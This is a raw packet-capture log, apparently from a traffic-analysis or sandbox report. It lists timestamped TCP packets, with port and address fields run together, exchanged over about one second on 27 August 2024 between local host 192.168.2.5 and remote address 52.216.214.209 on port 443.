                                                Aug 27, 2024 12:55:14.804805994 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.804837942 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.804847002 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.804871082 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.805190086 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.805202961 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.805257082 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.805264950 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.805289984 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.805835962 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.805852890 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.805886030 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.805892944 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.805921078 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.806395054 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.806406975 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.806444883 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.806452036 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.806462049 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.807506084 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.807518959 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.807571888 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.807580948 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.849486113 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.890750885 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.890782118 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.890841007 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.890889883 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.890898943 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.890944004 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.891113043 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.891130924 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.891165972 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.891171932 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.891200066 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.891799927 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.891834021 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.891860008 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.891870975 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.891879082 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.891906023 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.891930103 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.892307043 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.892323017 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.892364025 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.892369032 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.892374992 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.892399073 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.892416954 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.893033028 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.893045902 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.893091917 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.893099070 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.893105030 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.893141031 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.893148899 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.893155098 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.893179893 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.893196106 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.893202066 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.893234968 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.893245935 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.893801928 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.893855095 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.893867016 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.893919945 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.893927097 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.893955946 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.943101883 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.977989912 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.978025913 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.978060007 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.978163958 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.978174925 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.978293896 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.978384018 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.978398085 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.978429079 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.978498936 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.978511095 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.978589058 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.978971958 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.978986025 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.979028940 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.979029894 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.979039907 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.979057074 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.979084969 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.979526043 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.979540110 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.979598045 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.979610920 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.980243921 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.980269909 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.980298996 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.980305910 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.980330944 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.980349064 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.980375051 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.980403900 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.980411053 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.980436087 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.981261969 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.981290102 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.981321096 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.981328964 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.981355906 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.981514931 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.981538057 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.981573105 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.981580973 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:14.981604099 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:14.981628895 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.070025921 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.070043087 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.070071936 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.070188046 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.070202112 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.070513010 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.070535898 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.070616961 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.070627928 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.071074963 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.071086884 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.071127892 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.071136951 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.071160078 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.071762085 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.071779013 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.071825027 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.071835041 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.071851969 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.071872950 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.071886063 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.071918011 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.071923971 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.071949959 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.072797060 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.072813034 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.072858095 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.072866917 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.072904110 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.072920084 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.072954893 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.072962046 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.072974920 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.115082026 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.115098953 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.152766943 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.152786970 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.152827978 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.152843952 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.152861118 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.153482914 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.153496981 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.153549910 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.153557062 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.153956890 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.153970003 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.154016972 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.154026031 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.154040098 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.155205965 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.155235052 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.155268908 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.155277014 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.155309916 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.155332088 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.155723095 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.155736923 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.155786991 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.155791998 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.155798912 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.155837059 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.156383038 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.156398058 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.156438112 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.156455040 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.156462908 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.156507015 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.156572104 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.156586885 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.156626940 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.156630993 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.156640053 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.156661987 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.157388926 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.157406092 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.157444954 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.157452106 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.157481909 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.208901882 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.240659952 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.240684032 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.240722895 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.240746975 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.240762949 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.240777969 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.241079092 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.241100073 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.241127014 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.241136074 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.241164923 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.241645098 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.241674900 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.241697073 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.241708994 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.241714954 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.241744041 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.241769075 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.242305040 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.242325068 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.242377996 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.242383957 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.242389917 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.242423058 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.242835045 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.242854118 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.242889881 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.242911100 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.242918015 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.243326902 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.243423939 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.243438005 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.243472099 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.243475914 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.243484020 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.243501902 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.243520975 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.244055033 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.244075060 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.244110107 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.244137049 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.244144917 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.244188070 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.327896118 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.327914000 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.327958107 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.328025103 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.328042030 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.328119040 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.328537941 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.328552961 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.328587055 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.328607082 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.328613997 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.328653097 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.328901052 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.328915119 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.328941107 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.328963995 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.328969955 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.328995943 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.329484940 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.329509020 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.329540014 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.329546928 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.329572916 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.330127001 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.330140114 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.330200911 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.330208063 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.332329988 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.332360029 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.332389116 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.332396984 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.332403898 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.332428932 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.332453966 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.332487106 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.332499981 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.332535982 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.332544088 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.332551956 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.332573891 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.370942116 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.370968103 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.371022940 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.371038914 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.371051073 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.411878109 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.415708065 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.415721893 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.415754080 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.415807009 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.415822029 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.415863037 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.416085005 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.416099072 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.416127920 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.416145086 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.416152954 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.416188002 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.416209936 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.416759968 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.416774035 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.416807890 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.416841030 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.416850090 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.416878939 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.417396069 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.417412043 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.417450905 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.417459011 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.417490005 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.417972088 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.418004990 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.418037891 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.418051958 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.418077946 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.418519974 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.418544054 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.418577909 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.418584108 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.418596029 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.418617010 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.418638945 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.419193029 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.419205904 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.419236898 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.419260979 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.419270039 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.419294119 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.422117949 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.502964020 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.502980947 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.503021955 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.503120899 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.503139973 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.503376961 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.503393888 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.503479004 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.503488064 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.503885031 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.503897905 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.503952980 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.503958941 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.504549026 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.504565954 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.504606009 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.504615068 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:15.504637957 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:15.505065918 CEST4434970752.216.214.209192.168.2.5
